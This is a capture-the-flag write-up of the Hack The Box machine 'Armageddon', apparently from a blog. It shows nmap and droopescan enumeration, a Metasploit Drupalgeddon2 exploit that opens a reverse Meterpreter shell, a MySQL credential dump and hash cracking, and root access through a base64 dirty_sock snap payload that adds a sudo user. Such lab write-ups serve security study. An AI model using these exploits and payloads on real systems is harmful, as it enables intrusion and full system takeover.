Armageddon

armageddon infocard

Summary:

Armageddon a Linux machine (surprise, surprise), which hosts Drupal 7 – an open source content management system. The version is vulnerable to a plentitude of exploits. Gaining foothold is straightforward. Exploiting a remote code execution vulnerability provides foothold. Privilege escalation for user required us to dump credentials from a table within the application’s MySQL database. Gaining root introduced a new way (for me) to escalate privileges with snap binary. All in all, pretty fun box,

Enumeration

Service Scan

The service scan reveals two open ports. A web application is running and has interesting directories to check. Additionally, we see Drupal 7 running, which gives us somewhat of a direction.

# nmap -sC -sV -p-65535 armageddon                                                                             1 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-08 04:58 EDT
Nmap scan report for armageddon (10.10.10.233)
Host is up (0.050s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
|   256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_  256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to  Armageddon |  Armageddon

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.82 seconds

Droopescan

Thought to google dropal scanners and got a tool from github called droopescan.

# ./droopescan scan drupal -u http://armageddon
[+] Plugins found:                                                              
    profile http://armageddon/modules/profile/
    php http://armageddon/modules/php/
    image http://armageddon/modules/image/

[+] Themes found:
    seven http://armageddon/themes/seven/
    garland http://armageddon/themes/garland/

[+] Possible version(s):
    7.56

[+] Possible interesting urls found:
    Default changelog file - http://armageddon/CHANGELOG.txt

[+] Scan finished (0:01:07.454052 elapsed)

Searchsploit

Further internet searches on the applicable exploits led me to Drupalgeddon and will try it out in the next stage.

$ searchsploit drupal                    
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                      |  Path
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Drupal 4.0 - News Message HTML Injection                                                                            | php/webapps/21863.txt
Drupal 4.1/4.2 - Cross-Site Scripting                                                                               | php/webapps/22940.txt
Drupal 4.5.3 < 4.6.1 - Comments PHP Injection                                                                       | php/webapps/1088.pl
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution                                                         | php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection                                                                       | php/webapps/27020.txt
Drupal 5.2 - PHP Zend Hash ation Vector                                                                             | php/webapps/4510.txt
Drupal 5.21/6.16 - Denial of Service                                                                                | php/dos/10826.sh
Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities                                              | php/webapps/11060.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)                                                   | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)                                                    | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)                                         | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)                                         | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)                                            | php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities                                                                              | php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution                                                                  | php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution                                                             | php/webapps/3313.pl
Drupal < 5.1 - Post Comments Remote Command Execution                                                               | php/webapps/3312.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities                                                                       | php/webapps/33706.txt
Drupal < 7.34 - Denial of Service                                                                                   | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                                            | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)                                         | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                                 | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)                             | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)                                    | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)               | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution                                                      | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution                                                                  | php/webapps/46459.py
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure                                                   | php/webapps/44501.txt
Drupal Module Ajax Checklist 5.x-1.0 - Multiple SQL Injections                                                      | php/webapps/32415.txt
Drupal Module CAPTCHA - Security Bypass                                                                             | php/webapps/35335.html
Drupal Module CKEditor 3.0 < 3.6.2 - Persistent EventHandler Cross-Site Scripting                                   | php/webapps/18389.txt
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting                              | php/webapps/25493.txt
Drupal Module CODER 2.5 - Remote Command Execution (Metasploit)                                                     | php/webapps/40149.rb
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution                                                       | php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting                                             | php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload                                      | php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities        | php/webapps/35072.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)                                                   | php/remote/40130.rb
Drupal Module Sections - Cross-Site Scripting                                                                       | php/webapps/10485.txt
Drupal Module Sections 5.x-1.2/6.x-1.2 - HTML Injection                                                             | php/webapps/33410.txt
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Exploit

metasploit drupalgeddon2

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

[*] Started reverse TCP handler on 10.10.14.6:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending stage (39282 bytes) to 10.10.10.233
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.233:41324) at 2021-06-08 06:09:47 -0400
meterpreter > sysinfo                                                                                                                                 
Computer    : armageddon.htb                                                                                                                          
OS          : Linux armageddon.htb 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020 x86_64                                              
Meterpreter : php/linux                                                                                                                               

Privilege Escalation

We have a couple of directories in /var/www/html directory. After traversing the files, I have discovered a config file which contains a password and a username in settings.php within sites/default directory. I have also uploaded some privesc tools such as unix-privesc-check and linenum from meterpreter upload functionality.

ls
authorize.php  cron.php   INSTALL.mysql.txt  INSTALL.sqlite.txt  linenum.sh       modules   README.txt  sites               update.php     web.config
CHANGELOG.txt  includes   INSTALL.pgsql.txt  INSTALL.txt         MAINTAINERS.txt  out.txt   robots.txt  themes              UPGRADE.txt    xmlrpc.php
COPYRIGHT.txt  index.php  install.php        LICENSE.txt         misc             profiles  scripts     unix-privesc-check
cat usersdump.sql
<deleted>
$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => '<edited>',
      'username' => '<edited>',
      'password' => '<edited>',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
<deleted>

Next, I’m using the credentials to login to drupal db and enumerate its tables. Following that, I’m dumping the users table from the database ‘drupal’. Finally, I am analysing the dump file and discovered credentials for brucetherealadmin.

mysql -u drupaluser -p -D drupal -e 'show tables;'

<deleted> 

users

<deleted>

mysqldump -u drupaluser -p drupal users > usersdump.sql

cat usersdump.sql

<deleted>
(1,'brucetherealadmin','$S$DgL2gjv<edited>','[email protected]','','','filtered_html',1606998756,1607077194,1607076276,1,'Europe/London','',0,'[email protected]','a:1:{s:7:\"overlay\";i:1;}'),
<deleted>

Cracking the hash with john was easy and straightforward.

john forjohn -w /usr/share/wordlists/rockyou.txt

$ cat /home/kali/.john/john.pot
$S$DgL2gjv<spoil>:b<edited>

Remembered there is an ssh service running so I tried logging into it.

# ssh [email protected]                             
The authenticity of host '10.10.10.233 (10.10.10.233)' can't be established.
ECDSA key fingerprint is SHA256:bC1R/FE5sI72ndY92lFyZQt4g1VJoSNKOeAkuuRr4Ao.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.233' (ECDSA) to the list of known hosts.
[email protected]'s password: 
Last login: Fri Mar 19 08:01:19 2021 from 10.10.14.5
[[email protected] ~]$ 

I have discovered that the binary snap does not require password and is owned by root.

[email protected] ~]$ sudo -l
Matching Defaults entries for brucetherealadmin on armageddon:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
    LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
    LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *

A little research on snap gives us GTFO-bins solutions to the problem.

  1. Tried https://gtfobins.github.io/gtfobins/snap/ but did not work.
  2. A bit additional research reveals https://github.com/initstring/dirty_sock

I have followed the steps from ‘2’ and it did not work. It seems the python version is incorrect. So I coppied the source code of the exploit and pasted it into a new file and ran it with the correct python version.

AsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A"*4256 + "=="' | base64 -d > dirty.snap
[[email protected] tmp]$ ls
ds2.py     systemd-private-a2763202598b48bcb69371e110e1c4e7-httpd.service-bwuFlM
id_rsa     systemd-private-a2763202598b48bcb69371e110e1c4e7-mariadb.service-DFOvzD
dirty.snap
[[email protected] tmp]$ sudo /usr/bin/snap install --devmode dirty.snap 
dirty-sock 0.1 installed
[[email protected] tmp]$ su dirty_sock
Password: 
[[email protected] tmp]$ whoami
dirty_sock
[[email protected] tmp]$ 
[[email protected] tmp]$ sudo -i

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for dirty_sock: 
[[email protected] ~]# whoami
root
[[email protected] ~]# 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: